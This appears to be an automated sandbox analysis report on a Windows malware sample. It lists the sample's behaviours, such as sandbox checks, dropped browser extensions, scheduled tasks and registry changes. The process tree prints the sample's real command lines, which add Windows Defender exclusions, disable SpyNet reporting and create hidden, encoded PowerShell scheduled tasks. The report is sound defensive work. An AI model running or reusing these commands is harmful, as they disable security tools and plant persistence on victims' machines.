Analysis
-
max time kernel
150s -
max time network
159s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/04/2024, 10:57
Static task
static1
Behavioral task
behavioral1
Sample
a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe
Resource
win10v2004-20240226-en
General
-
Target
a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe
-
Size
6.7MB
-
MD5
3bcf3ad5da1c9f7f54b99404d5bb2a14
-
SHA1
f36359ff1be260d6c59a194c3257a8a2816bc4b7
-
SHA256
a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3
-
SHA512
062cd16c7bd808fb9029de8c7bc1188da62d3d47222256cf453f4539809d1de75ea175b3544957e0485e5765bcc8bd11da72ff7525cc746392f114a57500eca3
-
SSDEEP
98304:91OmpDcPHB7oWB0q32sghrEGog5UFI0eDyNGfJ9cnqzdmHQuuWy4rk0yaYWngUxA:91OmSKWBz3lgi+0fYLfsvry4A0y2g4Po
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 3544 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Control Panel\International\Geo\Nation YyQFmUW.exe -
Executes dropped EXE 3 IoCs
pid Process 4212 Install.exe 2860 WTYIUVQ.exe 4920 YyQFmUW.exe -
Loads dropped DLL 1 IoCs
pid Process 3544 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json YyQFmUW.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json YyQFmUW.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini YyQFmUW.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 YyQFmUW.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WTYIUVQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 YyQFmUW.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 YyQFmUW.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YyQFmUW.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WTYIUVQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content YyQFmUW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YyQFmUW.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml YyQFmUW.exe File created C:\Program Files (x86)\LCifMpYymZWU2\MIqjTUamxhRiS.dll YyQFmUW.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YyQFmUW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YyQFmUW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja YyQFmUW.exe File created C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml YyQFmUW.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\XDqQbzK.dll YyQFmUW.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml YyQFmUW.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\CEULdTQ.dll YyQFmUW.exe File created C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll YyQFmUW.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\CswRwZy.dll YyQFmUW.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi YyQFmUW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi YyQFmUW.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml YyQFmUW.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job schtasks.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1964 schtasks.exe 928 schtasks.exe 2816 schtasks.exe 2356 schtasks.exe 1600 schtasks.exe 5116 schtasks.exe 3320 schtasks.exe 4852 schtasks.exe 1040 schtasks.exe 648 schtasks.exe 3128 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\MaxCapacity = "14116" YyQFmUW.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\NukeOnDelete = "0" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket YyQFmUW.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" YyQFmUW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3872 powershell.EXE 3872 powershell.EXE 3912 powershell.exe 3912 powershell.exe 1300 powershell.exe 1300 powershell.exe 2204 powershell.EXE 2204 powershell.EXE 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe 4920 YyQFmUW.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3872 powershell.EXE Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 2204 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2128 wrote to memory of 4212 2128 a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe 80 PID 2128 wrote to memory of 4212 2128 a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe 80 PID 2128 wrote to memory of 4212 2128 a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe 80 PID 4212 wrote to memory of 3100 4212 Install.exe 82 PID 4212 wrote to memory of 3100 4212 Install.exe 82 PID 4212 wrote to memory of 3100 4212 Install.exe 82 PID 4212 wrote to memory of 2868 4212 Install.exe 84 PID 4212 wrote to memory of 2868 4212 Install.exe 84 PID 4212 wrote to memory of 2868 4212 Install.exe 84 PID 3100 wrote to memory of 4924 3100 forfiles.exe 86 PID 3100 wrote to memory of 4924 3100 forfiles.exe 86 PID 3100 wrote to memory of 4924 3100 forfiles.exe 86 PID 2868 wrote to memory of 652 2868 forfiles.exe 87 PID 2868 wrote to memory of 652 2868 forfiles.exe 87 PID 2868 wrote to memory of 652 2868 forfiles.exe 87 PID 4924 wrote to memory of 3636 4924 cmd.exe 88 PID 4924 wrote to memory of 3636 4924 cmd.exe 88 PID 4924 wrote to memory of 3636 4924 cmd.exe 88 PID 4924 wrote to memory of 5012 4924 cmd.exe 89 PID 4924 wrote to memory of 5012 4924 cmd.exe 89 PID 4924 wrote to memory of 5012 4924 cmd.exe 89 PID 652 wrote to memory of 3944 652 cmd.exe 90 PID 652 wrote to memory of 3944 652 cmd.exe 90 PID 652 wrote to memory of 3944 652 cmd.exe 90 PID 652 wrote to memory of 4892 652 cmd.exe 91 PID 652 wrote to memory of 4892 652 cmd.exe 91 PID 652 wrote to memory of 4892 652 cmd.exe 91 PID 4212 wrote to memory of 1600 4212 Install.exe 92 PID 4212 wrote to memory of 1600 4212 Install.exe 92 PID 4212 wrote to memory of 1600 4212 Install.exe 92 PID 4212 wrote to memory of 2140 4212 Install.exe 94 PID 4212 wrote to memory of 2140 4212 Install.exe 94 PID 4212 wrote to memory of 2140 4212 Install.exe 94 PID 3872 wrote to memory of 928 3872 powershell.EXE 98 PID 3872 wrote to memory of 928 3872 powershell.EXE 98 PID 4212 wrote to memory of 2252 4212 Install.exe 103 PID 4212 wrote to memory of 2252 4212 Install.exe 103 PID 4212 wrote to memory of 2252 4212 Install.exe 103 PID 4212 wrote to memory of 1964 4212 Install.exe 105 PID 4212 wrote to memory of 1964 4212 Install.exe 105 PID 4212 wrote to memory of 1964 4212 Install.exe 105 PID 2860 wrote to memory of 3912 2860 WTYIUVQ.exe 108 PID 2860 wrote to memory of 3912 2860 WTYIUVQ.exe 108 PID 2860 wrote to memory of 3912 2860 WTYIUVQ.exe 108 PID 3912 wrote to memory of 4384 3912 powershell.exe 110 PID 3912 wrote to memory of 4384 3912 powershell.exe 110 PID 3912 wrote to memory of 4384 3912 powershell.exe 110 PID 4384 wrote to memory of 2040 4384 cmd.exe 111 PID 4384 wrote to memory of 2040 4384 cmd.exe 111 PID 4384 wrote to memory of 2040 4384 cmd.exe 111 PID 3912 wrote to memory of 1720 3912 powershell.exe 112 PID 3912 wrote to memory of 1720 3912 powershell.exe 112 PID 3912 wrote to memory of 1720 3912 powershell.exe 112 PID 3912 wrote to memory of 708 3912 powershell.exe 113 PID 3912 wrote to memory of 708 3912 powershell.exe 113 PID 3912 wrote to memory of 708 3912 powershell.exe 113 PID 3912 wrote to memory of 968 3912 powershell.exe 114 PID 3912 wrote to memory of 968 3912 powershell.exe 114 PID 3912 wrote to memory of 968 3912 powershell.exe 114 PID 3912 wrote to memory of 4744 3912 powershell.exe 115 PID 3912 wrote to memory of 4744 3912 powershell.exe 115 PID 3912 wrote to memory of 4744 3912 powershell.exe 115 PID 3912 wrote to memory of 3640 3912 powershell.exe 116 PID 3912 wrote to memory of 3640 3912 powershell.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe.\Install.exe /XodidE "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵PID:3636
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵PID:5012
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
PID:652 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵PID:3944
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵PID:4892
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEMytGLpP" /SC once /ST 07:52:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEMytGLpP"3⤵PID:2140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEMytGLpP"3⤵PID:2252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe\" hl /Tnsite_idMfj 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:928
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:460
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2280
-
